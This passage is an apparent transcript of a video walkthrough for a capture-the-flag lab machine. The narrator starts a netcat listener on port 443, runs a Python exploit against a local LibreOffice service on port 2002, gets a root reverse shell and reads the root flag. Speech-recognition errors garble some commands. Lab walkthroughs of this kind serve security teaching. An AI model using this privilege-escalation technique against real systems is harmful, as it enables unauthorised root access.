may not work. All right, okay, so good, we have an absolute path to this reverse shell, and let's save and go and try. All right, okay. All right, so I'll need to set up a listener. I don't know where to set up this listener. Okay. Where should I set up this listener? Okay, I'll just set the listener below. I'm not sure. I need to. Yeah, I can set the listener up here. Okay, so nclvnp, and then 443, that's the port that we specified, and then we go up here, we do ls. So this is the exploit that we're going to run. So if we just do python train Soffice, okay, so if we run it this way, it's like it has to accept some arguments. All right, so host, and then the host file, the host, and then the port. All right, so the host is going to run on localhost, and then the port is going to be the where is it? So the port 2002. All right, the port that the LibreOffice is running on. Where is it? It's this port. All right, so let's go and do that. So we run it again. So this time around, we specify the host. Host is 127.0.0.1, and then port is 2002. All right, so if everything goes right, we should get a reverse shell as root. All right, that's it. So we got the reverse shell. So that's it. We have root. So we'll do who am I? I'm root. All right, then let's move to our root folder. let's export term equals to xterm, and let's clear, and then let's list, and then we can see our root file, our root flag, so we can cut root.txt. all right, so we have our root flag. All right, so this should be the end of the video. I hope it's been informative, and then don't forget to like and subscribe for more insightful videos. all right, so I'll just put my root here, and that's the end of the box. Thank you so much. See you again in another video.